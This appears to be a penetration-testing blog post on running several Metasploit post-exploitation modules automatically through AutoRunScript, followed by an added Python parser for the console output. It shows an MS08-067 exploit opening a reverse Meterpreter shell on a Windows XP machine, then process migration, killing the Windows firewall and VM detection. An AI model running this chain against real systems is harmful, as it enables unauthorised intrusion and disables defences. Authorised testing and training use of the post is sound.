Automation is the name of the pentest game
Metasploit AutoRunScript is great when you need a module to run automatically post-exploitation. Getting a single script to run once a Meterpreter session opens is pretty easy, but what if you want multiple post scripts to run? From the msfconsole prompt, run: set AutoRunScript multi_console_command -rc "path/name of rc file"
msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc
Inside of the rc file, just list the commands one per line, like so:
run post/windows/manage/migrate
run post/windows/manage/killfw
run post/windows/gather/checkvm
Now save the file autoruncommands.rc inside of the /root folder. Don’t use killfw because you won’t find it in your install. It is a module I wrote to autokill the Windows firewall.
Now let's watch it in action:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.200.40:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400
meterpreter >
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*] Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*] Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
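As an added example (not part of the original post or of Metasploit itself), the console output above can be parsed into a per-session record of which post modules ran and what each reported, which is handy for engagement notes and for reviewing what an automated run touched. The function and field names are assumptions, and the sample transcript is constructed from the output shown above.

```python
import re

# Constructed sample: the AutoRunScript portion of the console output above.
TRANSCRIPT = """\
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*] Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*] Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*] Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
"""

SESSION = re.compile(r"Session ID (\d+) \((\S+) -> (\S+)\) processing AutoRunScript '(.+)'")
COMMAND = re.compile(r"Running command run (\S+)")

def parse_autorun(text):
    """Return one record per session: the script used and each module's output."""
    sessions, current, step = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SESSION.search(line)
        if m:  # a new session started processing its AutoRunScript
            current = {"id": int(m.group(1)), "handler": m.group(2),
                       "target": m.group(3), "script": m.group(4), "steps": []}
            sessions.append(current)
            step = None
            continue
        if current is None:
            continue  # output before any AutoRunScript banner is ignored
        m = COMMAND.search(line)
        if m:  # each "Running command run <module>" opens a new step
            step = {"module": m.group(1), "output": []}
            current["steps"].append(step)
        elif step is not None and line[:3] in ("[*]", "[+]", "[-]"):
            # keep the status marker (*, + or -) alongside the message text
            step["output"].append((line[1], line[4:]))
    return sessions
```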